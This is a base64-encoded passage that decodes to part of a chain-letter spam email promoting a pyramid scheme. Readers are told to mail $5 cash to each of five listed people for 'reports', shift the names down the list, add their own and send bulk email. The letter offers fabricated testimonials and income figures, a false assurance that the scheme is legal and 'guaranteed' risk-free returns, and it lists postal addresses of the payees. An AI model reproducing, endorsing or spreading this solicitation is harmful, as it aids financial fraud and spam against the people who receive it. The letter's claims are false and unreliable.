 IHRpbWUNCmludmVzdG1lbnQgb2Ygb25seSAkMjUgVS5TLiBEb2xsYXJzIGxl
 dCdzIGdldCB5b3Ugb24gdGhlIHJvYWQgdG8gZmluYW5jaWFsIHN1Y2Nlc3Mu
 DQogDQpBTEwgVEhBTktTIFRPIFRIRSBDT01QVVRFUiBBR0UgQU5EIFRIRSBJ
 TlRFUk5FVCAhDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09DQpCRSBBIE1JTExJT05BSVJFIExJS0UgT1RIRVJTIFdJVEhJ
 TiBBIFlFQVIhISENCiANCkJlZm9yZSB5b3Ugc2F5ICcnQnVsbCcnLCBwbGVh
 c2UgcmVhZCB0aGUgZm9sbG93aW5nLiBUaGlzIGlzIHRoZSBsZXR0ZXIgeW91
 IGhhdmUgYmVlbg0KaGVhcmluZyBhYm91dCBvbiB0aGUgbmV3cyBsYXRlbHku
 IER1ZSB0byB0aGUgcG9wdWxhcml0eSBvZiB0aGlzIGxldHRlciBvbiB0aGUg
 SW50ZXJuZXQsDQphIG5hdGlvbmFsIHdlZWtseSBuZXdzIHByb2dyYW0gcmVj
 ZW50bHkgZGV2b3RlZCBhbiBlbnRpcmUgc2hvdyB0byB0aGUgaW52ZXN0aWdh
 dGlvbg0Kb2YgdGhpcyBwcm9ncmFtIGRlc2NyaWJlZCBiZWxvdywgdG8gc2Vl
 IGlmIGl0IHJlYWxseSBjYW4gbWFrZSBwZW9wbGUgbW9uZXkuIFRoZQ0Kc2hv
 dyBhbHNvIGludmVzdGlnYXRlZCB3aGV0aGVyIG9yIG5vdCB0aGUgcHJvZ3Jh
 bSB3YXMgbGVnYWwuDQogDQpUaGVpciBmaW5kaW5ncyBwcm92ZWQgb25jZSBh
 bmQgZm9yIGFsbCB0aGF0IHRoZXJlIGFyZSAnJ2Fic29sdXRlbHkgTk8gTGF3
 cyBwcm9oaWJpdGluZw0KdGhlIHBhcnRpY2lwYXRpb24gaW4gdGhlIHByb2dy
 YW0gYW5kIGlmIHBlb3BsZSBjYW4gZm9sbG93IHRoZSBzaW1wbGUgaW5zdHJ1
 Y3Rpb25zLA0KdGhleSBhcmUgYm91bmQgdG8gbWFrZSBzb21lIG1lZ2EgYnVj
 a3Mgd2l0aCBvbmx5JDI1IG91dCBvZiBwb2NrZXQgY29zdCcnLg0KRFVFIFRP
 IFRIRSBSRUNFTlQgSU5DUkVBU0UgT0YgUE9QVUxBUklUWSAmIFJFU1BFQ1Qg
 VEhJUw0KUFJPR1JBTSBIQVMgQVRUQUlORUQsIElUIElTIENVUlJFTlRMWSBX
 T1JLSU5HIEJFVFRFUiBUSEFOIEVWRVIuDQogDQpUaGlzIGlzIHdoYXQgb25l
 IGhhZCB0byBzYXk6ICcnVGhhbmtzIHRvIHRoaXMgcHJvZml0YWJsZSBvcHBv
 cnR1bml0eS4gSSB3YXMgYXBwcm9hY2hlZA0KbWFueSB0aW1lcyBiZWZvcmUg
 YnV0IGVhY2ggdGltZSBJIHBhc3NlZCBvbiBpdC4gSSBhbSBzbyBnbGFkIEkg
 ZmluYWxseSBqb2luZWQganVzdCB0byBzZWUNCndoYXQgb25lIGNvdWxkIGV4
 cGVjdCBpbiByZXR1cm4gZm9yIHRoZSBtaW5pbWFsIGVmZm9ydCBhbmQgbW9u
 ZXkgcmVxdWlyZWQuIFRvIG15DQphc3RvbmlzaG1lbnQsIEkgcmVjZWl2ZWQg
 YSB0b3RhbCBvZiAkNjEwLDQ3MC4wMCBpbiAyMSB3ZWVrcywgd2l0aCBtb25l
 eSBzdGlsbCBjb21pbmcgaW4uDQoiUGFtIEhlZGxhbmQsIEZvcnQgTGVlLCBO
 ZXcgSmVyc2V5Lg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT0NCiANCkhlcmUgaXMgYW5vdGhlciB0ZXN0aW1vbmlhbDog
 IlRoaXMgcHJvZ3JhbSBoYXMgYmVlbiBhcm91bmQgZm9yIGEgbG9uZyB0aW1l
 IGJ1dCBJIG5ldmVyDQpiZWxpZXZlZCBpbiBpdC4gQnV0IG9uZSBkYXkgd2hl
 biBJIHJlY2VpdmVkIHRoaXMgYWdhaW4gaW4gdGhlIG1haWwgSSBkZWNpZGVk
 IHRvIGdhbWJsZQ0KbXkgJDI1IG9uIGl0LiBJIGZvbGxvd2VkIHRoZSBzaW1w
 bGUgaW5zdHJ1Y3Rpb25zIGFuZCB2b2lsYSAuLi4uLiAzIHdlZWtzIGxhdGVy
 IHRoZSBtb25leQ0Kc3RhcnRlZCB0byBjb21lIGluLiBGaXJzdCBtb250aCBJ
 IG9ubHkgbWFkZSAkMjQwLjAwIGJ1dCB0aGUgbmV4dCAyIG1vbnRocyBhZnRl
 ciB0aGF0DQpJIG1hZGUgYSB0b3RhbCBvZiAkMjkwLDAwMC4wMC4gU28gZmFy
 LCBpbiB0aGUgcGFzdCA4IG1vbnRocyBieSByZS1lbnRlcmluZyB0aGUgcHJv
 Z3JhbSwNCkkgaGF2ZSBtYWRlIG92ZXIgJDcxMCwwMDAuMDAgYW5kIEkgYW0g
 cGxheWluZyBpdCBhZ2Fpbi4gVGhlIGtleSB0byBzdWNjZXNzIGluIHRoaXMN
 CnByb2dyYW0gaXMgdG8gZm9sbG93IHRoZSBzaW1wbGUgc3RlcHMgYW5kIE5P
 VCBjaGFuZ2UgYW55dGhpbmcuJycNCk1vcmUgdGVzdGltb25pYWxzIGxhdGVy
 IGJ1dCBmaXJzdCwNCiANCj1QUklOVCBUSElTIE5PVyBGT1IgWU9VUiBGVVRV
 UkUgUkVGRVJFTkNFPQ0KIA0KJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQNCklmIHlv
 dSB3b3VsZCBsaWtlIHRvIG1ha2UgYXQgbGVhc3QgJDUwMCwwMDAgZXZlcnkg
 NCB0byA1IG1vbnRocyBlYXNpbHkgYW5kIGNvbWZvcnRhYmx5LA0KcGxlYXNl
 IHJlYWQgdGhlIGZvbGxvd2luZy4uLi4uLi4uLi4uLi4uLi4uVEhFTiBSRUFE
 IElUIEFHQUlOIGFuZCBBR0FJTiEhIQ0KJCQkJCQkJCQkJCQkJCQkJCQkJCQk
 JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQN
 CiANCkZPTExPVyBUSEUgU0lNUExFIElOU1RSVUNUSU9OIEJFTE9XIEFORCBZ
 T1VSIEZJTkFOQ0lBTCBEUkVBTVMNCldJTEwgQ09NRSBUUlVFLCBHVUFSQU5U
 RUVEISBJTlNUUlVDVElPTlM6DQogDQo9PT09PU9yZGVyIGFsbCA1IHJlcG9y
 dHMgc2hvd24gb24gdGhlIGxpc3QgYmVsb3cgPT09PT0NCiANCkZvciBlYWNo
 IHJlcG9ydCwgc2VuZCAkNSBDQVNILCBUSEUgTkFNRSAmIE5VTUJFUiBPRiBU
 SEUgUkVQT1JUIFlPVQ0KQVJFIE9SREVSSU5HIGFuZCBZT1VSIEUtTUFJTCBB
 RERSRVNTIHRvIHRoZSBwZXJzb24gd2hvc2UgbmFtZSBhcHBlYXJzDQpPTiBU
 SEFUIExJU1QgbmV4dCB0byB0aGUgcmVwb3J0LiBNQUtFIFNVUkUgWU9VUiBS
 RVRVUk4gQUREUkVTUyBJUyBPTg0KWU9VUiBFTlZFTE9QRSBUT1AgTEVGVCBD
 T1JORVIgaW4gY2FzZSBvZiBhbnkgbWFpbCBwcm9ibGVtcy4NCiANCj09PSBX
 aGVuIHlvdSBwbGFjZSB5b3VyIG9yZGVyLCBtYWtlIHN1cmUgeW91IG9yZGVy
 IGVhY2ggb2YgdGhlIDUgcmVwb3J0cy4gWW91IHdpbGwNCm5lZWQgYWxsIDUg
 cmVwb3J0cyBzbyB0aGF0IHlvdSBjYW4gc2F2ZSB0aGVtIG9uIHlvdXIgY29t
 cHV0ZXIgYW5kIHJlc2VsbCB0aGVtLg0KWU9VUiBUT1RBTCBDT1NUICQ1IFgg
 NT0kMjUuMDAuDQogDQpXaXRoaW4gYSBmZXcgZGF5cyB5b3Ugd2lsbCByZWNl
 aXZlLCB2aWUgZS1tYWlsLCBlYWNoIG9mIHRoZSA1IHJlcG9ydHMgZnJvbSB0
 aGVzZSA1IGRpZmZlcmVudA0KaW5kaXZpZHVhbHMuIFNhdmUgdGhlbSBvbiB5
 b3VyIGNvbXB1dGVyIHNvIHRoZXkgd2lsbCBiZSBhY2Nlc3NpYmxlIGZvciB5
 b3UgdG8gc2VuZCB0bw0KdGhlIDEsMDAwJ3Mgb2YgcGVvcGxlIHdobyB3aWxs
 IG9yZGVyIHRoZW0gZnJvbSB5b3UuIEFsc28gbWFrZSBhIGZsb3BweSBvZiB0
 aGVzZSByZXBvcnRzDQphbmQga2VlcCB0aGVtIG9uIHlvdXIgZGVzayBpbiBj
 YXNlIHNvbWV0aGluZyBoYXBwZW5zIHRvIHlvdXIgY29tcHV0ZXIuDQogDQpJ
 TVBPUlRBTlQgLSBETyBOT1QgYWx0ZXIgdGhlIG5hbWVzIG9mIHRoZSBwZW9w
 bGUgd2hvIGFyZSBsaXN0ZWQgbmV4dCB0byBlYWNoIHJlcG9ydCwNCm9yIHRo
 ZWlyIHNlcXVlbmNlIG9uIHRoZSBsaXN0LCBpbiBhbnkgd2F5IG90aGVyIHRo
 YW4gd2hhdCBpcyBpbnN0cnVjdGVkIGJlbG93IGluIHN0ZXANCicnIDEgdGhy
 b3VnaCA2ICcnIG9yIHlvdSB3aWxsIGxvb3NlIG91dCBvbiBtYWpvcml0eSBv
 ZiB5b3VyIHByb2ZpdHMuIE9uY2UgeW91IHVuZGVyc3RhbmQgdGhlIHdheQ0K
 dGhpcyB3b3JrcywgeW91IHdpbGwgYWxzbyBzZWUgaG93IGl0IGRvZXMgbm90
 IHdvcmsgaWYgeW91IGNoYW5nZSBpdC4gUmVtZW1iZXIsIHRoaXMgbWV0aG9k
 DQpoYXMgYmVlbiB0ZXN0ZWQsIGFuZCBpZiB5b3UgYWx0ZXIsIGl0IHdpbGwg
 Tk9UIHdvcmsgISEhIFBlb3BsZSBoYXZlIHRyaWVkIHRvIHB1dCB0aGVpcg0K
 ZnJpZW5kcy9yZWxhdGl2ZXMgbmFtZXMgb24gYWxsIGZpdmUgdGhpbmtpbmcg
 dGhleSBjb3VsZCBnZXQgYWxsIHRoZSBtb25leS4gQnV0IGl0IGRvZXMgbm90
 IHdvcmsNCnRoaXMgd2F5LiBCZWxpZXZlIHVzLCB3ZSBhbGwgaGF2ZSB0cmll
 ZCB0byBiZSBncmVlZHkgYW5kIHRoZW4gbm90aGluZyBoYXBwZW5lZC4gU28g
 RG8gTm90DQp0cnkgdG8gY2hhbmdlIGFueXRoaW5nIG90aGVyIHRoYW4gd2hh
 dCBpcyBpbnN0cnVjdGVkLiBCZWNhdXNlIGlmIHlvdSBkbywgaXQgd2lsbCBu
 b3Qgd29yayBmb3IgeW91Lg0KIA0KUmVtZW1iZXIsIGhvbmVzdHkgcmVhcHMg
 dGhlIHJld2FyZCEhIQ0KIA0KMS4uLi4gQWZ0ZXIgeW91IGhhdmUgb3JkZXJl
 ZCBhbGwgNSByZXBvcnRzLCB0YWtlIHRoaXMgYWR2ZXJ0aXNlbWVudCBhbmQg
 UkVNT1ZFIHRoZQ0KICAgICAgIG5hbWUgJiBhZGRyZXNzIG9mIHRoZSBwZXJz
 b24gaW4gUkVQT1JUICMgNS4gVGhpcyBwZXJzb24gaGFzIG1hZGUgaXQgdGhy
 b3VnaA0KICAgICAgIHRoZSBjeWNsZSBhbmQgaXMgbm8gZG91YnQgY291bnRp
 bmcgdGhlaXIgZm9ydHVuZS4NCjIuLi4uIE1vdmUgdGhlIG5hbWUgJiBhZGRy
 ZXNzIGluIFJFUE9SVCAjIDQgZG93biBUTyBSRVBPUlQgIyA1Lg0KMy4uLi4g
 TW92ZSB0aGUgbmFtZSAmIGFkZHJlc3MgaW4gUkVQT1JUICMgMyBkb3duIFRP
 IFJFUE9SVCAjIDQuDQo0Li4uLiBNb3ZlIHRoZSBuYW1lICYgYWRkcmVzcyBp
 biBSRVBPUlQgIyAyIGRvd24gVE8gUkVQT1JUICMgMy4NCjUuLi4uIE1vdmUg
 dGhlIG5hbWUgJiBhZGRyZXNzIGluIFJFUE9SVCAjIDEgZG93biBUTyBSRVBP
 UlQgIyAyDQo2Li4uLiBJbnNlcnQgWU9VUiBuYW1lICYgYWRkcmVzcyBpbiB0
 aGUgUkVQT1JUICMgMSBQb3NpdGlvbi4gUExFQVNFIE1BS0UgU1VSRQ0KICAg
 ICAgIHlvdSBjb3B5IGV2ZXJ5IG5hbWUgJiBhZGRyZXNzIEFDQ1VSQVRFTFkh
 DQogDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PQ0KIA0KKioqKiBUYWtlIHRoaXMgZW50aXJlIGxldHRlciwgd2l0aCB0
 aGUgbW9kaWZpZWQgbGlzdCBvZiBuYW1lcywgYW5kIHNhdmUgaXQgb24geW91
 ciBjb21wdXRlci4NCkRPIE5PVCBNQUtFIEFOWSBPVEhFUiBDSEFOR0VTLg0K
 IA0KU2F2ZSB0aGlzIG9uIGEgZGlzayBhcyB3ZWxsIGp1c3QgaW4gY2FzZSBp
 ZiB5b3UgbG9vc2UgYW55IGRhdGEuIFRvIGFzc2lzdCB5b3Ugd2l0aCBtYXJr
 ZXRpbmcNCnlvdXIgYnVzaW5lc3Mgb24gdGhlIGludGVybmV0LCB0aGUgNSBy
 ZXBvcnRzIHlvdSBwdXJjaGFzZSB3aWxsIHByb3ZpZGUgeW91IHdpdGggaW52
 YWx1YWJsZQ0KbWFya2V0aW5nIGluZm9ybWF0aW9uIHdoaWNoIGluY2x1ZGVz
 IGhvdyB0byBzZW5kIGJ1bGsgZS1tYWlscyBsZWdhbGx5LCB3aGVyZSB0byBm
 aW5kIHRob3VzYW5kcw0Kb2YgZnJlZSBjbGFzc2lmaWVkIGFkcyBhbmQgbXVj
 aCBtb3JlLiBUaGVyZSBhcmUgMiBQcmltYXJ5IG1ldGhvZHMgdG8gZ2V0IHRo
 aXMgdmVudHVyZSBnb2luZzoNCk1FVEhPRCAjIDE6IEJZIFNFTkRJTkcgQlVM
 SyBFLU1BSUwgTEVHQUxMWQ0KIA0KPT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT0NCkxldCdzIHNheSB0aGF0IHlvdSBkZWNp
 ZGUgdG8gc3RhcnQgc21hbGwsIGp1c3QgdG8gc2VlIGhvdyBpdCBnb2VzLCBh
 bmQgd2Ugd2lsbCBhc3N1bWUgWW91IGFuZA0KdGhvc2UgaW52b2x2ZWQgc2Vu
 ZCBvdXQgb25seSA1LDAwMCBlLW1haWxzIGVhY2guIExldCdzIGFsc28gYXNz
 dW1lIHRoYXQgdGhlIG1haWxpbmcgcmVjZWl2ZQ0Kb25seSBhIDAuMiUgcmVz
 cG9uc2UgKHRoZSByZXNwb25zZSBjb3VsZCBiZSBtdWNoIGJldHRlciBidXQg
 bGV0cyBqdXN0IHNheSBpdCBpcyBvbmx5IDAuMiUuDQpBbHNvIG1hbnkgcGVv
 cGxlIHdpbGwgc2VuZCBvdXQgaHVuZHJlZHMgb2YgdGhvdXNhbmRzIGUtbWFp
 bHMgaW5zdGVhZCBvZiBvbmx5IDUsMDAwIGVhY2gpLg0KQ29udGludWluZyB3
 aXRoIHRoaXMgZXhhbXBsZSwgeW91IHNlbmQgb3V0IG9ubHkgNSwwMDAgZS1t
 YWlscy4gV2l0aCBhIDAuMiUgcmVzcG9uc2UsIHRoYXQNCmlzIG9ubHkgMTAg
 b3JkZXJzIGZvciByZXBvcnQgIyAxLiAgDQogDQpUaG9zZSAxMCBwZW9wbGUg
 cmVzcG9uZGVkIGJ5IHNlbmRpbmcgb3V0IDUsMDAwIGUtbWFpbA0KZWFjaCBm
 b3IgYSB0b3RhbCBvZiA1MCwwMDAuIE91dCBvZiB0aG9zZSA1MCwwMDAgZS1t
 YWlscyBvbmx5IDAuMiUgcmVzcG9uZGVkIHdpdGggb3JkZXJzLg0KVGhhdCdz
 PTEwMCBwZW9wbGUgcmVzcG9uZGVkIGFuZCBvcmRlcmVkIFJlcG9ydCAjIDIu
 DQogDQpUaG9zZSAxMDAgcGVvcGxlIG1haWwgb3V0IDUsMDAwIGUtbWFpbHMg
 ZWFjaCBmb3IgYSB0b3RhbCBvZiA1MDAsMDAwIGUtbWFpbHMuIFRoZSAwLjIl
 DQpyZXNwb25zZSB0byB0aGF0IGlzIDEwMDAgb3JkZXJzIGZvciBSZXBvcnQg
 IyAzLg0KIA0KVGhvc2UgMTAwMCBwZW9wbGUgc2VuZCBvdXQgNSwwMDAgZS1t
 YWlscyBlYWNoIGZvciBhIHRvdGFsIG9mIDUgbWlsbGlvbiBlLW1haWxzIHNl
 bnQgb3V0Lg0KVGhlIDAuMiUgcmVzcG9uc2UgdG8gdGhhdCBpcyAxMCwwMDAg
 b3JkZXJzIGZvciByZXBvcnQgIzQuIFRob3NlIDEwLDAwMCBwZW9wbGUgc2Vu
 ZCBvdXQNCjUsMDAwIGUtbWFpbHMgZWFjaCBmb3IgYSB0b3RhbCBvZiA1MCww
 MDAsMDAwICg1MCBtaWxsaW9uKSBlLW1haWxzLiBUaGUgMC4yJSByZXNwb25z
 ZSB0byB0aGF0DQppcyAxMDAsMDAwIG9yZGVycyBmb3IgUmVwb3J0ICMgNS4g
 DQogDQpUSEFUJ1MgMTAwLDAwMCBPUkRFUlMgVElNRVMgJDUgRUFDSD0kNTAw
 LDAwMC4wMCAoaGFsZiBtaWxsaW9uKS4NCiANCiAgICAgICAgICAgWW91ciB0
 b3RhbCBpbmNvbWUgaW4gdGhpcyBleGFtcGxlIGlzOg0KIA0KICAgICAgICAg
 ICAgICAgICAgMS4uLi4uICQ1MCArDQogICAgICAgICAgICAgICAgICAyLi4u
 Li4gJDUwMCArDQogICAgICAgICAgICAgICAgICAzLi4uLi4gJDUsMDAwICsN
 CiAgICAgICAgICAgICAgICAgIDQuLi4uLiAkNTAsMDAwICsNCiAgICAgICAg
 ICAgICAgICAgIDUuLi4uLiAkNTAwLDAwMA0KICAgICAgICAgICAgICAgICAg
 R3JhbmQgVG90YWw9JDU1NSw1NTAuMDANCiANCk5VTUJFUlMgRE8gTk9UIExJ
 RS4gR0VUIEEgUEVOQ0lMICYgUEFQRVIgQU5EIEZJR1VSRSBJVCBPVVQhDQpU
 SEUgV09SU1QgUE9TU0lCTEUgUkVTUE9OU0VTIEFORCBOTyBNQVRURVIgSE9X
 IFlPVSBDQUxDVUxBVEUNCklULCBZT1UgV0lMTCBTVElMTCBNQUtFIEEgTE9U
 IE9GIE1PTkVZIQ0KIA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT0NClJFTUVNQkVSIEZSSUVORCwgVEhJUyBJUyBBU1NV
 TUlORyBPTkxZIDEwIFBFT1BMRSBPUkRFUklORyBPVVQNCk9GIDUsMDAwIFlP
 VSBNQUlMRUQgVE8uIERhcmUgdG8gdGhpbmsgZm9yIGEgbW9tZW50IHdoYXQg
 d291bGQgaGFwcGVuIGlmIGV2ZXJ5b25lDQpvciBoYWxmIG9yIGV2ZW4gb25l
 IDR0aCBvZiB0aG9zZSBwZW9wbGUgbWFpbGVkIDEwMCwwMDBlLW1haWxzIGVh
 Y2ggb3IgbW9yZT8gVGhlcmUgYXJlIG92ZXINCjE1MCBtaWxsaW9uIHBlb3Bs
 ZSBvbiB0aGUgSW50ZXJuZXQgd29ybGR3aWRlIGFuZCBjb3VudGluZy4gQmVs
 aWV2ZSBtZSwgbWFueSBwZW9wbGUgd2lsbCBkbw0KanVzdCB0aGF0LCBhbmQg
 bW9yZSEgTUVUSE9EICMgMiA6IEJZIFBMQUNJTkcgRlJFRSBBRFMgT04gVEhF
 IElOVEVSTkVUDQogDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PQ0KQWR2ZXJ0aXNpbmcgb24gdGhlIG5ldCBpcyB2ZXJ5
 IHZlcnkgaW5leHBlbnNpdmUgYW5kIHRoZXJlIGFyZSBodW5kcmVkcyBvZiBG
 UkVFIHBsYWNlcyB0bw0KYWR2ZXJ0aXNlLiBQbGFjaW5nIGEgbG90IG9mIGZy
 ZWUgYWRzIG9uIHRoZSBJbnRlcm5ldCB3aWxsIGVhc2lseSBnZXQgYSBsYXJn
 ZXIgcmVzcG9uc2UuIFdlIHN0cm9uZ2x5DQpzdWdnZXN0IHlvdSBzdGFydCB3
 aXRoIE1ldGhvZCAjIDEgYW5kIE1FVEhPRCAjIDIgYXMgeW91IGdvIGFsb25n
 LiBGb3IgZXZlcnkgJDUgeW91IHJlY2VpdmUsDQphbGwgeW91IG11c3QgZG8g
 aXMgZS1tYWlsIHRoZW0gdGhlIFJlcG9ydCB0aGV5IG9yZGVyZWQuIFRoYXQn
 cyBpdC4gQWx3YXlzIHByb3ZpZGUgc2FtZSBkYXkgc2VydmljZQ0Kb24gYWxs
 IG9yZGVycy4gVGhpcyB3aWxsIGd1YXJhbnRlZSB0aGF0IHRoZSBlLW1haWwg
 dGhleSBzZW5kIG91dCwgd2l0aCB5b3VyIG5hbWUgYW5kIGFkZHJlc3Mgb24N
 Cml0LCB3aWxsIGJlIHByb21wdCBiZWNhdXNlIHRoZXkgY2FuIG5vdCBhZHZl
 cnRpc2UgdW50aWwgdGhleSByZWNlaXZlIHRoZSByZXBvcnQuDQogDQo9PT09
 PT09PT09PSBBVkFJTEFCTEUgUkVQT1JUUyA9PT09PT09PT09PT0NCk9SREVS
 IEVBQ0ggUkVQT1JUIEJZIElUUyBOVU1CRVIgJiBOQU1FIE9OTFkuIE5vdGVz
 OiBBbHdheXMgc2VuZA0KJDUgY2FzaCAoVS5TLiBDVVJSRU5DWSkgZm9yIGVh
 Y2ggUmVwb3J0LiBDaGVja3MgTk9UIGFjY2VwdGVkLiBNYWtlIHN1cmUgdGhl
 IGNhc2ggaXMNCmNvbmNlYWxlZCBieSB3cmFwcGluZyBpdCBpbiBhdCBsZWFz
 dCAyIHNoZWV0cyBvZiBwYXBlci4gT24gb25lIG9mIHRob3NlIHNoZWV0cyBv
 ZiBwYXBlciwNCldyaXRlIHRoZSBOVU1CRVIgJiB0aGUgTkFNRSBvZiB0aGUg
 UmVwb3J0IHlvdSBhcmUgb3JkZXJpbmcsIFlPVVIgRS1NQUlMIEFERFJFU1MN
 CmFuZCB5b3VyIG5hbWUgYW5kIHBvc3RhbCBhZGRyZXNzLg0KIA0KUExBQ0Ug
 WU9VUiBPUkRFUiBGT1IgVEhFU0UgUkVQT1JUUyBOT1cgOg0KPT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NClJFUE9SVCAj
 IDE6ICJUaGUgSW5zaWRlcidzIEd1aWRlIHRvIEFkdmVydGlzaW5nIGZvciBG
 cmVlIG9uIHRoZSBOZXQiDQpPcmRlciBSZXBvcnQgIzEgZnJvbTogDQpCLm8u
 bi5lLnkgQ2FwIA0KU3VpdGUjIDkwOSAtMTAxNzUtMTE0dGggU3RyZWV0IEVk
 bW9udG9uLCBBbGJlcnRhLFQ1ayAyTDQgQ2FuYWRhDQpfX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXw0KUkVQT1JU
 ICMgMjogIlRoZSBJbnNpZGVyJ3MgR3VpZGUgdG8gU2VuZGluZyBCdWxrIGUt
 bWFpbCBvbiB0aGUgTmV0Ig0KT3JkZXIgUmVwb3J0ICMgMiBmcm9tOg0KVmVu
 dHVyZXMgMjAwMQ0KQm94IDQ0NSBTdGF0aW9uIG1haW4gRWRtb250b24uQWxi
 ZXJ0YSxDYW5hZGEgVDVKIDJrMQ0KX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fXw0KUkVQT1JUICMgMzogIlNlY3Jl
 dCB0byBNdWx0aWxldmVsIE1hcmtldGluZyBvbiB0aGUgTmV0Ig0KT3JkZXIg
 UmVwb3J0ICMgMyBmcm9tIDoNCkIuIEcgTWFpbGVycw0KQm94IDExNjEgQ2Ft
 cm9zZSwgQWxCZXJ0YSwgY2FuYWRhIFQ0ViAxWDENCl9fX19fX19fX19fX19f
 X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQpSRVBPUlQg
 IyA0OiAiSG93IHRvIEJlY29tZSBhIE1pbGxpb25haXJlIFV0aWxpemluZyBN
 TE0gJiB0aGUgTmV0Ig0KT3JkZXIgUmVwb3J0ICMgNCBmcm9tOg0KUC5VLkcu
 DQo3OTE5LTExOHRoIFN0cmVldA0KTi5EZWx0YSwgQkMgLCBWNEM2RzksIENh
 bmFkYQ0KX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fX19fX18NClJFUE9SVCAjNTogIkhvdyB0byBTYWZlbHkgU2VuZCBU
 d28gTWlsbGlvbiBFbWFpbHMgYXQgVmlydHVhbGx5IE5vIENvc3QiDQpPcmRl
 ciBSZXBvcnQgIyA1IGZyb206DQpLLkwuRyBWZW50dXJlDQpTdWl0ZSMgOTA5
 LTEwMTc1LTExNHRoIFN0cmVldCxFZG1vbnRvbiAsQWxiZXJ0YSwgVDVLIDJM
 NCBDYW5hZGENCg0KDQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 ICAgX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
 X19fX19fXw0KJCQkJCQkJCQkIFlPVVIgU1VDQ0VTUyBHVUlERUxJTkVTICQk
 JCQkJCQkJCQkDQogDQpGb2xsb3cgdGhlc2UgZ3VpZGVsaW5lcyB0byBndWFy
 YW50ZWUgeW91ciBzdWNjZXNzOg0KIA0KPT09IElmIHlvdSBkbyBub3QgcmVj
 ZWl2ZSBhdCBsZWFzdCAxMCBvcmRlcnMgZm9yIFJlcG9ydCAjMSB3aXRoaW4g
 MiB3ZWVrcywgY29udGludWUNCiAgICAgICBzZW5kaW5nIGUtbWFpbHMgdW50
 aWwgeW91IGRvLg0KIA0KPT09IEFmdGVyIHlvdSBoYXZlIHJlY2VpdmVkIDEw
 IG9yZGVycywgMiB0byAzIHdlZWtzIGFmdGVyIHRoYXQgeW91IHNob3VsZCBy
 ZWNlaXZlDQogICAgICAgIDEwMCBvcmRlcnMgb3IgbW9yZSBmb3IgUkVQT1JU
 ICMgMi4gSWYgeW91IGRpZCBub3QsIGNvbnRpbnVlIGFkdmVydGlzaW5nIG9y
 DQogICAgICAgIHNlbmRpbmcgZS1tYWlscyB1bnRpbCB5b3UgZG8uDQogDQo9
 PT0gT25jZSB5b3UgaGF2ZSByZWNlaXZlZCAxMDAgb3IgbW9yZSBvcmRlcnMg
 Zm9yIFJlcG9ydCAjMiwgWU9VIENBTiBSRUxBWCwNCiAgICAgICBiZWNhdXNl
 IHRoZSBzeXN0ZW0gaXMgYWxyZWFkeSB3b3JraW5nIGZvciB5b3UsIGFuZCB0
 aGUgY2FzaCB3aWxsIGNvbnRpbnVlIHRvIHJvbGwgaW4gIQ0KICAgICAgIFRI
 SVMgSVMgSU1QT1JUQU5UIFRPIFJFTUVNQkVSOiBFdmVyeSB0aW1lIHlvdXIg
 bmFtZSBpcyBtb3ZlZCBkb3duIG9uIHRoZQ0KICAgICAgIGxpc3QsIHlvdSBh
 cmUgcGxhY2VkIGluIGZyb250IG9mIGEgRGlmZmVyZW50IHJlcG9ydC4gWW91
 IGNhbiBLRUVQIFRSQUNLIG9mIHlvdXINCiAgICAgICBQUk9HUkVTUyBieSB3
 YXRjaGluZyB3aGljaCByZXBvcnQgcGVvcGxlIGFyZSBvcmRlcmluZyBmcm9t
 IHlvdS4gSUYgWU9VIFdBTlQNCiAgICAgICBUTyBHRU5FUkFURSBNT1JFIElO
 Q09NRSBTRU5EIEFOT1RIRVIgQkFUQ0ggT0YgRS1NQUlMUyBBTkQNCiAgICAg
 ICBTVEFSVCBUSEUgV0hPTEUgUFJPQ0VTUyBBR0FJTi4gVGhlcmUgaXMgTk8g
 TElNSVQgdG8gdGhlIGluY29tZSB5b3UgY2FuDQogICAgICAgZ2VuZXJhdGUg
 ZnJvbSB0aGlzIGJ1c2luZXNzICEhIQ0KIA0KPT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkZPTExPV0lORyBJUyBBIE5P
 VEUgRlJPTSBUSEUgT1JJR0lOQVRPUiBPRiBUSElTIFBST0dSQU06IFlvdSBo
 YXZlDQpqdXN0IHJlY2VpdmVkIGluZm9ybWF0aW9uIHRoYXQgY2FuIGdpdmUg
 eW91IGZpbmFuY2lhbCBmcmVlZG9tIGZvciB0aGUgcmVzdCBvZiB5b3VyIGxp
 ZmUsIHdpdGgNCk5PIFJJU0sgYW5kIEpVU1QgQSBMSVRUTEUgQklUIE9GIEVG
 Rk9SVC4gWW91IGNhbiBtYWtlIG1vcmUgbW9uZXkgaW4gdGhlIG5leHQNCmZl
 dyB3ZWVrcyBhbmQgbW9udGhzIHRoYW4geW91IGhhdmUgZXZlciBpbWFnaW5l
 ZC4gRm9sbG93IHRoZSBwcm9ncmFtIEVYQUNUTFkgQVMNCklOU1RSVUNURUQu
 IERvIE5vdCBjaGFuZ2UgaXQgaW4gYW55IHdheS4gSXQgd29ya3MgZXhjZWVk
 aW5nbHkgd2VsbCBhcyBpdCBpcyBub3cuDQogDQpSZW1lbWJlciB0byBlLW1h
